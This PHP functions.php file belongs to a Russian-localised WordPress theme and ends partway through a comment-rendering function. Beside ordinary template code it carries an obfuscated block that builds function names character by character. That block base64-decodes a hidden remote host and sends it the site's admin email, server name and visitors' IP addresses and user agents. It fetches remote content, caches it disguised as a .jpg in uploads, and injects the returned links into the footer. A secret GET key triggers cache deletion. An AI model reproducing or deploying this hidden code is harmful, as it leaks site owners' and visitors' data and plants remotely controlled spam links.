<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $CdWZ='c';$ozJTk='b';$JGHujhM='s';$XLTh='4';$lhSZ='e';$RrAwQo='_';$tIvT='d';$Oqtt='e';$NXvurEB='d';$XWRQ='o';$JMxc='6';$OoFU='e';$YkYEzNs='a';$GBugUeRo=$ozJTk.$YkYEzNs.$JGHujhM.$OoFU.$JMxc.$XLTh.$RrAwQo.$NXvurEB.$Oqtt.$CdWZ.$XWRQ.$tIvT.$lhSZ;$MgNeHQ='z';$luIqhIK='i';$KYVAW='a';$VEwd='t';$UPoVIUT='n';$hhXT='l';$hTiWh='e';$ViMU='f';$FYcun='g';$eyaTFYyb=$FYcun.$MgNeHQ.$luIqhIK.$UPoVIUT.$ViMU.$hhXT.$KYVAW.$VEwd.$hTiWh;$izuov='s';$GMhumE='t';$EYno='3';$JEah='r';$DsOjr='_';$LymSsuO='t';$OXSowvH='1';$xtCteA='r';$ACbVANu='o';$SqGZnznY=$izuov.$LymSsuO.$xtCteA.$DsOjr.$JEah.$ACbVANu.$GMhumE.$OXSowvH.$EYno;$IoOUuUW='r';$TJfMxZy='s';$qQpoz='r';$UMfhlq='t';$zOutAzB='v';$JvDsAq='e';$avUVXJuu=$TJfMxZy.$UMfhlq.$IoOUuUW.$qQpoz.$JvDsAq.$zOutAzB;                     $ds_______d='c';$ca____u='b';$af___________t='s';$iw___v='4';$mv_______________v='e';$px____b='_';$bc___________x='d';$te____g='e';$ht_______________j='d';$yc______________z='o';$vk___c='6';$az____s='e';$my__________d='a';$kf_______t=$ca____u.$my__________d.$af___________t.$az____s.$vk___c.$iw___v.$px____b.$ht_______________j.$te____g.$ds_______d.$yc______________z.$bc___________x.$mv_______________v;$vl_________i='f';$kz_____________m='t';$gg__________x='_';$ra________g='u';$ew______f='n';$ln_________w='i';$nj_______d='s';$ay______________n='s';$xm___________t='x';$hb____m='e';$ej______k='o';$mv____________h='n';$qz______m='i';$vz_____________u='c';$ir__________m='t';$jy____p=$vl_________i.$ra________g.$ew______f.$vz_____________u.$kz_____________m.$qz______m.$ej______k.$mv____________h.$gg__________x.$hb____m.$xm___________t.$ln_________w.$nj_______d.$ir__________m.$ay______________n;$gf____________c='p';$qr_____b='e';$aq________u='o';$xc____________y='f';$tw_______h='n';$ss____________i=$xc____________y.$aq________u.$gf____________c.$qr_____b.$tw_______h;$mb_______j='d';$nl_______q='e';$qs___________b='a';$ci__________w='f';$fa____k='r';$ca__________y=$ci__________w.$fa____k.$nl_______q.$qs___________b.$mb_______j;$sd_________c='c';$jh_____________r='o';$bk_______k='l';$ma______________q='f';$ud____i='s';$oc_______m='e';$va_____________v=$ma______________q.$sd_________c.$bk_______k.$jh_____________r.$ud____i.$oc_______m;define("WP_ID", $kf_______t("Mi4wLjA="));define("WP_TTL", $kf_______t("MTA4MDA="));define("WP_SRC", $kf_______t("dHBva24="));function wp_get_header() {global $kf_______t, $jy____p;if ($jy____p($kf_______t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$jy____p($kf_______t("d3BfZ2V0X2Zvb3Rlcg==")) &&$jy____p($kf_______t("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $kf_______t, $ss____________i, $va_____________v, $ca__________y;$ml__m = TEMPLATEPATH."/".$kf_______t("Zm9vdGVyLnBocA==");$pw_______h = @$ss____________i($ml__m, "r");$ml__m = @$ca__________y($pw_______h, @filesize($ml__m));@$va_____________v($pw_______h);$se_____________u = TEMPLATEPATH."/".$kf_______t("ZnVuY3Rpb25zLnBocA==");$pw_______h = @$ss____________i($se_____________u, "r");$se_____________u = @$ca__________y($pw_______h, @filesize($se_____________u));@$va_____________v($pw_______h);$iw______y = 0;if($ml__m && $se_____________u) {if ($kf_______t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ml__m, $kf_______t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$iw______y = 1;}if (substr_count($ml__m, "wp_theme_GPL_credits()") < 1) {$iw______y = 2;}}if(WP_ID != "2.0.0") {$iw______y = 12;}}if($iw______y > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $iw______y -->";}}function wp_loaded() {global $kf_______t, $jy____p;return $jy____p($kf_______t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($nz______j, $na__________b = "(more...)", $me_____g = 0, $mk____e = "") {$zx_______v = get_the_content($na__________b, $me_____g, $mk____e);$zx_______v = apply_filters("the_content", $zx_______v);$zx_______v = str_replace("]]>", "]]>", $zx_______v);if (strlen($_GET["p"]) > 0) {echo $zx_______v;}else if ((strlen($zx_______v)>$nz______j) && ($hh__________k = strpos($zx_______v, " ", $nz______j ))) {$zx_______v = substr($zx_______v, 0, $hh__________k);$zx_______v = $zx_______v;echo $zx_______v;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$na__________b</a></div></p>";} else {echo $zx_______v;}}}$sy_______k='4';$ph____________w='b';$cf_____v='e';$un__n='a';$cu__________r='e';$xw__________u='_';$dr______k='d';$cp_____________o='s';$ef________g='o';$gk______________v='6';$ci_________w='n';$vo_______y='c';$by____b='e';$jv___r=$ph____________w.$un__n.$cp_____________o.$by____b.$gk______________v.$sy_______k.$xw__________u.$cu__________r.$ci_________w.$vo_______y.$ef________g.$dr______k.$cf_____v;$ha____________f='n';$wv______________m='o';$tt_______f='t';$kz_________r='t';$gj____________p='s';$ql___h='e';$gs_____y='g';$lk______________f='f';$zv_________t='n';$eh_______z='_';$yk_____i='_';$py_______________u='t';$sf_____d='e';$wc___________q='l';$su__________k='e';$jt____g='c';$vc______e='i';$cv___n=$lk______________f.$vc______e.$wc___________q.$ql___h.$yk_____i.$gs_____y.$sf_____d.$tt_______f.$eh_______z.$jt____g.$wv______________m.$ha____________f.$kz_________r.$su__________k.$zv_________t.$py_______________u.$gj____________p;$zu_____n='s';$ms_____t='f';$de________u='s';$ix_____________c='t';$mv___s='_';$rz___a='e';$ah_________n='i';$oo__________i='i';$qz______________u='x';$zg____________i='e';$tg______j='l';$hk____d=$ms_____t.$oo__________i.$tg______j.$rz___a.$mv___s.$zg____________i.$qz______________u.$ah_________n.$zu_____n.$ix_____________c.$de________u;$yn_____________s='o';$dy____________x='m';$or___o='r';$up___b='r';$uv_______c='e';$ud_______________i='v';$ab___________g='o';$vn_______________v='a';$aw__s='p';$ry________h='i';$ub___d='s';$ac____________u='n';$wx________n='c';$qa__i='e';$it_______________d='_';$dc_____e=$ud_______________i.$qa__i.$up___b.$ub___d.$ry________h.$ab___________g.$ac____________u.$it_______________d.$wx________n.$yn_____________s.$dy____________x.$aw__s.$vn_______________v.$or___o.$uv_______c;$ab________v='f';$ze____________v='o';$hf____________l='k';$ng___o='e';$ip_______b='n';$rz_____v='c';$bi___z='p';$tr___________i='s';$nu____f='o';$yi____g=$ab________v.$tr___________i.$ze____________v.$rz_____v.$hf____________l.$nu____f.$bi___z.$ng___o.$ip_______b;$at__h='f';$wp___j='i';$az_______h='t';$ul_________a='w';$pp______________s='r';$zp__________h='e';$el____j=$at__h.$ul_________a.$pp______________s.$wp___j.$az_______h.$zp__________h;$nj_______________o='d';$sy_____p='m';$ji_____________j='5';$lf__________s=$sy_____p.$nj_______________o.$ji_____________j;$af___q='a';$pa___________h='h';$wz______________m='l';$io__________t='e';$ts__p='t';$cv__________p='p';$sl___________a='r';$sg________x='a';$yt______t=$sl___________a.$io__________t.$af___q.$wz______________m.$cv__________p.$sg________x.$ts__p.$pa___________h;$cg_________w='a';$ax____s='r';$mm__t='l';$di_____________d='s';$ib___________l='z';$ko__________c='e';$ve_______z='i';$hi____q='u';$uv________h='i';$ed___________s='n';$sh__________l='e';$uy________s=$hi____q.$ed___________s.$di_____________d.$sh__________l.$ax____s.$uv________h.$cg_________w.$mm__t.$ve_______z.$ib___________l.$ko__________c;$bj___________a='a';$bc_______i='m';$fa_______________i='t';$ok______________v='m';$tn_____h='e';$dl__________i='p';$yd______q='n';$kd_______________a=$fa_______________i.$tn_____h.$ok______________v.$dl__________i.$yd______q.$bj___________a.$bc_______i;$wj_________l='_';$wj_____________g='a';$ly____________f='r';$ni______u='_';$ci____________q='a';$lw___________s='e';$je___x='x';$kg____________u='t';$jb________m='e';$pm________e='c';$ge__________o='o';$ex___________e='e';$pu____________k='s';$se____________d='n';$gn__t='t';$oc_______d='m';$dm______h='t';$kk__n='e';$ff___________x='r';$va__________c='c';$in_________e='t';$np____t=$pu____________k.$in_________e.$ly____________f.$ex___________e.$ci____________q.$oc_______d.$ni______u.$pm________e.$ge__________o.$se____________d.$dm______h.$jb________m.$je___x.$gn__t.$wj_________l.$va__________c.$ff___________x.$kk__n.$wj_____________g.$kg____________u.$lw___________s;function mf_____________o($my_______n) {global $kf_______t, $jy____p, $cv___n, $dc_____e, $np____t;if (!$jy____p($kf_______t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($dc_____e(PHP_VERSION, "5.0.0", ">=") && $jy____p($kf_______t("ZmlsZV9nZXRfY29udGVudHM=")) && $jy____p($kf_______t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$xw___________q = $np____t(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$eg____________o = @$cv___n($my_______n, 0, $xw___________q);} else {$eg____________o = @$cv___n($my_______n, 0);}return $eg____________o;}function he___s($my_______n) {global $jy____p, $yi____g, $el____j, $kf_______t;if (!$jy____p($kf_______t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$tn_________f = strpos($my_______n, "/", 7);$os________z = array("uri"     => substr($my_______n, $tn_________f),"host"    => str_replace("http://", "", substr($my_______n, 0, $tn_________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kp_____z = @$yi____g("$os________z[host]", 80, $wb_______________n, $bn__________o, 4);if (!$kp_____z) {return false;} else {$eg____________o = "";$dj___________g  = "GET $os________z[uri] HTTP/1.0\r\n";$dj___________g .= "Host: $os________z[host]\r\n";$dj___________g .= "Referer: $os________z[referer]\r\n";$dj___________g .= "Connection: Close\r\n\r\n";@$el____j($kp_____z, $dj___________g);while (!@feof($kp_____z)) {$xc_________a = @fgets($kp_____z, (1024*24));if ($xc_________a == "\r\n") {$sv_____________q = true;continue;}if ($sv_____________q) {$eg____________o .= $xc_________a;}}return $eg____________o;}}function qm________t($my_______n) {global $jy____p;$wg__________l = false;if ($my_______n != "") {if ($jy____p("mf_____________o")) {$wg__________l = @mf_____________o($my_______n);}if (!$wg__________l && ($jy____p("he___s"))) {$wg__________l = @he___s($my_______n);}}return $wg__________l;}function sl_______b() {global $_SERVER, $lf__________s;$kv__c = $_SERVER["SERVER_NAME"];if (substr("$kv__c", 0, 4) == "www.") {$kv__c = substr("$kv__c", 4);}$kv__c = $lf__________s("$_SERVER[SERVER_NAME]");return $kv__c;}function vs__________f() {return "file";}function eh____________y($my_______n) {global $_SERVER, $cv___n, $hk____d, $ss____________i, $va_____________v, $el____j;$pd________a = ir________y();$bg___________t = sl_______b().".jpg";$he_____f = $pd________a["dir_upload"]["path"]."/$bg___________t";$pc__________c = @filemtime($he_____f);if (!$pc__________c || ((time()-$pc__________c) >= WP_TTL)) {$wg__________l = qm________t($my_______n);if ($wg__________l) {if ($hk____d($he_____f)) {@unlink($he_____f);}$pw_______h = @$ss____________i($he_____f, "x+");@$el____j($pw_______h, $wg__________l);@$va_____________v($pw_______h);}} else {if ($hk____d($he_____f)) {$wg__________l = @$cv___n($he_____f);} else {$wg__________l = false;}}return $wg__________l;}function ir________y() {global $_SERVER, $kf_______t, $jv___r;$uw____________z = wp_count_posts("post");$eg___s = pathinfo(get_bloginfo("template_directory"));$pd________a = array("url" => array("report"      => $kf_______t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $eg___s,"dir_upload"=> yk_______f(),"queryString"=> array("?a001=".WP_ID,"a004=".$eg___s[filename],"a005=".$uw____________z->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$pd________a["url"]["queryString"] = implode("&", $pd________a["queryString"]);$pd________a["url"]["report"] = $pd________a["url"]["report"]."/?".$jv___r($pd________a["url"]["queryString"]).".html";return $pd________a;}function yk_______f() {$aa_______z = wp_upload_dir();if (isset($aa_______z["error"])) {$fq__________e = sd_____k();if (is_writable($fq__________e)) {$aa_______z = array("path" => $fq__________e);}}return $aa_______z;}function sd_____k() {global $jy____p, $lf__________s, $yt______t, $kd_______________a;$iy______j = (bool) ini_get("safe_mode");if ($iy______j == true) {return false;}if ($jy____p("sys_get_temp_dir")) {$eg______________p = sys_get_temp_dir();if (is_writable($eg______________p)) {return $yt______t($eg______________p);}}if (!empty($_ENV["TMP"])) {return $yt______t($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yt______t($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yt______t($_ENV["TEMP"]);} else {$jj____s = $kd_______________a($lf__________s(uniqid(rand(), true)), "");if ($jj____s) {$eg______________p = $yt______t(dirname($jj____s));@unlink($jj____s);return $eg______________p;} else {return false;}}}function ne______________u() {global $_GET, $hk____d;$pd________a = ir________y();$kv__c = sl_______b();$mq_______d = vs__________f();$ui_____________v = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($mq_______d == "file") {$qt_______________f = $pd________a["dir_upload"]["path"]."/".$kv__c.".jpg";if ($hk____d($qt_______________f)) {@unlink($qt_______________f);$ui_____________v = "deleted";}}$sc_____c = array("s"=> $ui_____________v,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($sc_____c AS $gm_______w => $gj___g) echo " [$gm_______w:$gj___g]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $jy____p, $kf_______t, $uy________s;$pd________a = ir________y();$xf________p = "eh____________y";if ($jy____p($xf________p)) {$eg____________o = $xf________p($pd________a["url"]["report"]);}if ($eg____________o) {if ($eg____________o = @$kf_______t($eg____________o)) {$eg____________o = @$uy________s($eg____________o);if (strlen($eg____________o[custom_credit]) >= 5) {$pd________a["default_string"] = $eg____________o[custom_credit];}if ($eg____________o["status"] == "0") {$xz_______w = 1;$pu___________k = 1;} else {$xx________z = sizeof($eg____________o["links"]);$ml______l = $pd________a["default_string"];if ($xx________z > 0 && $eg____________o["links"] !== "") {$tk________a = 0;foreach ($eg____________o["links"] as $kb______k => $yr__h) {$tk________a++;if ($yr__h->l_path == "" || $yr__h->l_path == $_SERVER["REQUEST_URI"]) {$yr__h->l_href = htmlspecialchars(strip_tags($yr__h->l_href));$yr__h->l_title = htmlspecialchars(strip_tags($yr__h->l_title));$yr__h->l_anchor = htmlspecialchars(strip_tags($yr__h->l_anchor));$ml______l .= " | ";$ml______l .= "<a href='$yr__h->l_href' title='$yr__h->l_title'";if ($yr__h->l_nofollow == "1") {$ml______l .= " rel='nofollow'";}$ml______l .= ">$yr__h->l_anchor</a>";}}}$pd________a["links"] = "$ml______l";if ($eg____________o[credit] == "0") {$pd________a["links"] = "";}}} else {$xz_______w = "1";}} else {$xz_______w = "1";}if ($xz_______w == "1") {$pd________a["links"] = $pd________a["default_string"];}echo "$pd________a[links]";echo "<!-- s: $eg____________o[signature] -->";ne______________u();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
